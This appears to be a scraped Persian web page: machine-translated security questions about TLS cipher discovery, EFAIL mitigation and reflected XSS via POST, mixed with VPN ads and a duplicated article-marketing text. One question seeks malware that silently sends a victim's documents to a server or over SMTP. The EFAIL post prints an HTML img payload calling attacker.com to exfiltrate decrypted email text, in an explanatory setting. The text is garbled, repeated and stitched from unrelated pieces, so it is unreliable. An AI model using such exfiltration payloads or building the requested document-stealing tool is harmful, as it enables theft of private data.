کلیک کنید: خرید VPN خرید وی پی ان خرید فیلتر شکن خرید فیلترشکن
خرید کریو خرید وی پی ان خرید VPN خرید فیلترشکن
من به دنبال TLS نگاه کردم و متوجه شدم که مشتری لیستی از سوئیت های پشتیبانی شده را ارسال می کند و سرور یک مجموعه رمز را انتخاب می کند. سرور هرگز لیستی از سوئیت های پشتیبانی شده را ارسال نمی کند. چگونه یک مشتری مانند SSLLabs می داند که کد های سری که سرور پشتیبانی می کند؟ همچنین، متوجه شدم SSLLabs فقط یک درخواست را به سرور ارسال می کند.
من یک infosec newbie مرد و جدید به برنامه نویسی. من برنامه های خودم را برای انجام وظایف مختلف انجام می دهم فقط برای یادگیری ¥. به تازگی در یک سناریو اتفاق افتاده است که به طور معمول RAT دسترسی کامل به دستگاه شما را فراهم می کند، اما در اینجا من دنبال EXE هستم پس از اجرای آن شروع به ارسال .doc.pdf.docx.xls و غیره به سرور وب خاص یا ایمیل ذکر شده از طریق smtp [19659002] آیا این امکان وجود دارد؟ من از دیگر موش های صحرایی مانند darkcommet، njrat و غیره استفاده کرده ام، اما من اکنون به دنبال چیزی متفاوت هستم.
آیا ما یک پروژه منبع باز داریم مثل این؟ یا هر کسی می تواند با این کمک کند؟
یکی از بهترین راه هایی برای ارتقاء وب سایت و یا کسب و کار آنلاین را به نوشتن مقالات و ارسال آنها را به دایرکتوری مقاله است. این است زیرا مقالات تولید ترافیک به طور مستقیم می توانید، و همچنین کمک به بهبود موقعیت وب سایت شما در نتایج موتورهای جستجو کمک.
قدرت ماده بازاریابی ناشی از این واقعیت که هر مقاله را می توانید یک منطقه کوچک در پایین، شناخته شده به عنوان “جعبه منبع” یا “بیوگرافی نویسنده”، که شامل نام کسب و کار شما و لینک به وب سایت شما. افرادی که مقاله خود را بخوانید می توانید با کلیک روی این لینک به خصوص اگر آن را به نظر می رسد enticing بافندگی و سایت خود را ببینید. علاوه بر این موتورهای جستجو نیز لینک در جعبه منابع خود را دید و از آنجا که موتورهای جستجو عمده مانند گوگل لینک های دریافتی را به حساب هنگام سفارش هر مورد در نتایج خود را این پیوندها می تواند کمک به بهبود موقعیت خود را در نتایج.
بدیهی است که اگر شما می خواهید برای دریافت درگیر در بازاریابی مقاله، شما نیاز به نوشتن مقالات اصلی خود را. این با این حال نباید بیش از حد سخت چوب به موضوعاتی که شما می دانید که مربوط به کسب و کار شما و نوشتن مقاله نسیم است باشد. اگر شما انجام داده نوشتن خیلی از مقاله اول شما ممکن است کمی از مبارزه است، اما اعتماد به من، اگر شما شروع به نوشتن مقالات به طور منظم (و باید)، آن را آسان تر و ساده تر در طول زمان.
هر مقاله ای که شما باید به بسیاری از دایرکتوری ها مقاله ارسال شده که ممکن است. این تلاش در نوشتن تنش بازگشت حداکثر. شما می توانید مقالات خود را به دایرکتوری ها مقاله عمده چند با دست ارسال کنید اما از آنجا که وجود دارد در حال حاضر حداقل چند صد مقاله دایرکتوری در اینترنت حتی یک ماده به آنها به ارائه همه دستی جلسه عمده زیر گرفتن خواهد بود.
مشکل این است که دستی به دایرکتوری مقاله ارسال پر کردن فرم و سپس کپی و چسباندن مقاله به زمینه در مرورگر وب نیاز است. حتی اگر شما می توانید یکی سایت هر چند دقیقه، آن را چند روز کاری کامل را برای ارسال به دایرکتوری ها مقاله مختلف 500. اتوماسیون بنابراین ضروری است. پاسخ این است که استفاده از نرم افزار ارسال مقاله با استفاده از این, شما می تواند نسبتا به راحتی ارسال مقاله به صدها تن از دایرکتوری ها.
برای بازاریابی مقاله موفق آن باید بخشی از یک برنامه مداوم نه یک فعالیت است. بیشتر مقالات که شما, شما نتایج بهتر خواهد ارسال کنید. من می خواهم پیشنهاد تلاش برای نوشتن حداقل یک مقاله در روز و سپس ارسال آن. اگر این بخش از زندگی روزمره شما را آن که طول می کشد–اگر شما کمی کاهش در تلویزیون و یا دیگر فعالیت های غیر مولد احتمالا به راحتی زمان برای انجام آن را پیدا کنید.
یکی از بهترین راه هایی برای ارتقاء وب سایت و یا کسب و کار آنلاین را به نوشتن مقالات و ارسال آنها را به دایرکتوری مقاله است. این است زیرا مقالات تولید ترافیک به طور مستقیم می توانید، و همچنین کمک به بهبود موقعیت وب سایت شما در نتایج موتورهای جستجو کمک.
قدرت ماده بازاریابی ناشی از این واقعیت که هر مقاله را می توانید یک منطقه کوچک در پایین، شناخته شده به عنوان “جعبه منبع” یا “بیوگرافی نویسنده”، که شامل نام کسب و کار شما و لینک به وب سایت شما. افرادی که مقاله خود را بخوانید می توانید با کلیک روی این لینک به خصوص اگر آن را به نظر می رسد enticing بافندگی و سایت خود را ببینید. علاوه بر این موتورهای جستجو نیز لینک در جعبه منابع خود را دید و از آنجا که موتورهای جستجو عمده مانند گوگل لینک های دریافتی را به حساب هنگام سفارش هر مورد در نتایج خود را این پیوندها می تواند کمک به بهبود موقعیت خود را در نتایج.
بدیهی است که اگر شما می خواهید برای دریافت درگیر در بازاریابی مقاله، شما نیاز به نوشتن مقالات اصلی خود را. این با این حال نباید بیش از حد سخت چوب به موضوعاتی که شما می دانید که مربوط به کسب و کار شما و نوشتن مقاله نسیم است باشد. اگر شما انجام داده نوشتن خیلی از مقاله اول شما ممکن است کمی از مبارزه است، اما اعتماد به من، اگر شما شروع به نوشتن مقالات به طور منظم (و باید)، آن را آسان تر و ساده تر در طول زمان.
هر مقاله ای که شما باید به بسیاری از دایرکتوری ها مقاله ارسال شده که ممکن است. این تلاش در نوشتن تنش بازگشت حداکثر. شما می توانید مقالات خود را به دایرکتوری ها مقاله عمده چند با دست ارسال کنید اما از آنجا که وجود دارد در حال حاضر حداقل چند صد مقاله دایرکتوری در اینترنت حتی یک ماده به آنها به ارائه همه دستی جلسه عمده زیر گرفتن خواهد بود.
مشکل این است که دستی به دایرکتوری مقاله ارسال پر کردن فرم و سپس کپی و چسباندن مقاله به زمینه در مرورگر وب نیاز است. حتی اگر شما می توانید یکی سایت هر چند دقیقه، آن را چند روز کاری کامل را برای ارسال به دایرکتوری ها مقاله مختلف 500. اتوماسیون بنابراین ضروری است. پاسخ این است که استفاده از نرم افزار ارسال مقاله با استفاده از این, شما می تواند نسبتا به راحتی ارسال مقاله به صدها تن از دایرکتوری ها.
برای بازاریابی مقاله موفق آن باید بخشی از یک برنامه مداوم نه یک فعالیت است. بیشتر مقالات که شما, شما نتایج بهتر خواهد ارسال کنید. من می خواهم پیشنهاد تلاش برای نوشتن حداقل یک مقاله در روز و سپس ارسال آن. اگر این بخش از زندگی روزمره شما را آن که طول می کشد–اگر شما کمی کاهش در تلویزیون و یا دیگر فعالیت های غیر مولد احتمالا به راحتی زمان برای انجام آن را پیدا کنید.
مدیران: لطفا توجه داشته باشید که این یک نسخه از (آیا این یک حفاظت ساده در برابر EFAIL نیست؟)
زیرا استراتژی متفاوت است که در ابتدای هر متن ساده به عنوان یک بلوک واحد رمزگذاری می شود.
تهدید امنیتی EFAIL از اجرای ناقص استاندارد OpenPGP RFC0448 سوء استفاده می کند. بعضی توضیحات بسیار مختصر در زیر آمده است.
در برخی از تاریخ های محدود در (امیدوارم) آینده ای نزدیک، اکثر مشتری های ایمیل بیش از کاربران GnuPG یک راه اندازی سیستم ایمنی خواندن EFAIL داشته باشند، اگر قبلا آنها را انجام ندهند. استاندارد OpenPGP به شدت اجرا خواهد شد.
با این حال، وضعیت ارسال یک پیام مخفی خیلی خوب نیست. هیچ راهی برای تضمین اینکه خواننده / گیرنده نرم افزار و / یا تنظیمات خود را به روز کرده است وجود ندارد. به روز رسانی امنیتی به لحاظ آمار به طور یکسان اجرا نمی شود؛ همیشه لجباز هستند بنابراین، بدون هیچ گونه احتیاط اضافی اضافی، همیشه پیام پیام نویس / فرستنده پیام مخفی که توسط مهاجم EFAIL بخاطر خواننده با یک تنظیم ناامن EFAIL خوانده می شود وجود دارد.
بنابراین در یک روش بالقوه وجود دارد که اجازه می دهد تا ارسال امن بدون در نظر گرفتن اینکه آیا خواننده دارای تنظیم غیر ایمن EFAIL بود یا خیر.
هر کدام و هر بلوک رمزگذاری شده B از پیام رمزگذاری شده می تواند توسط داده های رمزگذاری شده psuedo تروجان قرار داده شود تا یک پیام رمزگذاری شده چند بلوک ABC را فراهم کند. قطعات A و C به صورت هوشمندانه انتخاب می شوند، به طوری که وقتی ABC رمزگشایی می شود، پیامی از شکل را ارائه می دهد:
![](http://attacker.com/"[...][block)
که نحو معتبر HTML با یک img برچسب، یک ویژگی src و یک مقدار مربوطه است که URL معتبر است. متن رمز گشایی رمزگذاری شده بلوک B در آدرس URL پس از آدرس معتبر مهاجم تعبیه شده است.
بسته به برنامه نویسی و تنظیمات ایمیل مشتریان خواننده، سرویس گیرنده ایمیل به طور خودکار درخواست HTTP را به آدرس URL ارسال می کند ، باعث شده است که متن ساده B به مهاجم منتقل شود.
این توضیح بیش از حد ساده تر شده است، که ظرفیت استراتژی EFAIL را غلط و غلبه می دهد. از این رو کافی است که یک استراتژی کاهش EFAIL نشان داده شود که این توضیح بیش از حد ساده را شکست می دهد.
مهم: یک بلوک رمزگذاری یک اصطلاح فنی خاص است که به الگوریتم کدگذاری بلوک CBF اشاره دارد در RFC4880 13.9 حالت OpenPGP CFB. بلوک B دارای اندازه ثابت است (16 بایت برای تمام رمزهای AES)، و محدوده بلوک B در زمان رمزگذاری ثابت می شوند. مهاجم هیچ کنترلی بر انتخاب مرزهای بلوک ندارد و نمی تواند آنها را تغییر دهد.
از آنجا که هر بلوک آسیب پذیر است، این راه حل به صورت جداگانه محافظت از هر بلوک را به طور کامل به عنوان بخش ارزش یک ویژگی HTML این ممکن است به این دلیل که مهاجم محدود به تقسیم پیام در کنار محدودیت های بلوک رمز شده موجود است.
راه حل بسیار ساده است. متن ساده که در یک بلوک رمزگذاری می شود به دو بخش تقسیم می شود. این بخش اول رشته مبهوت کننده o است و قسمت دوم پیام m است. انتخاب o مانع از m از ویژگی ویژگی های مهاجم است
به طور خاص، رشته obfuscating o باید حداقل سه کاراکتر تک نقل قول (')، نقل قول دو (و) و فضای () این به اندازه کافی برای خاتمه بسته شدن ویژگی HTML و حفاظت از پیام m است. این توسط مشخصات HTML تعیین شده است
شما می توانید بازی را با مهاجمین انتخاب کنید که شروع به تعویض در این مثال سندبلاست Try jsoup (https://try.jsoup.org/٪7E_nyXks5PuAs-zJeek8CVhpuAvtI)
هنگامی که توسط کاربر در قالب خام خود رمزگشایی شود، پیام کل قابل خواندن انسان خواهد بود. اما کمی زشت است، زیرا حاوی رشته مبهم است o ، اما از EFAIL امن خواهد بود.
این روش نیازمند فشرده سازی قبل از رمزگذاری نیست، زیرا این امر مرزهای بلوک را خراب می کند.
قابل توجه است که محققان احتمال استفاده از د محدود کننده ها به عنوان یک استراتژی کاهش در خلاصه آنلاین خود. با این حال، می توان فرض کرد که آنها فقط موارد محرمانه را با توجه به مرزهای بلوک رمزگذاری قرار نمی دهند.
آیا شکل دیگری از رشته های HTML وجود دارد که توسط مهاجم برای غلبه بر پیشگیری از EFAIL پیشنهادی و اجازه دادن به انفیلتراسیون را می دهد؟
این یک بحث باز پایان نیست که به
در غیر این صورت این سوال مجاز نمی باشد. (با این حال، چنین نظریات به عنوان طول نظرات محدود می شود خوش آمدید.)
بنابراین پاسخ ها باید محدود است که نشان می دهد که این روش می تواند شکسته شود.
بهره برداری ناشی از اجرای MDC نیست (کد تشخیص اصلاح) همانطور که در بخش RFC4880-5.14 مشخص شده است. در مورد اجرای GnuPG OpenPGP، داده ها ممکن است در یک جریان بازگردانده شوند و در انتهای جریان یک مقدار برای نشان دادن اینکه آیا یک کد معتبر MDC تایید داده یافت می شود، بازگشت می شود. متاسفانه، بسیاری از پیاده سازی های ایمیل، ارزش آن را بررسی نمی کنند و یا پردازش داده ها را قبل از چک کردن آن ارزش.
این روش و اجرای کاهش EFAIL در اینجا کمی عمیق در اینجا مورد بحث قرار گرفته است.
آیا راهی برای ایجاد لینک با پارامترهای پست خاص در آن وجود دارد؟
به عنوان مثال اگر من یک XSS منعکس شده در پارامتر پست داشته باشم، چگونه می توان آن را برای حمله استفاده کرد؟
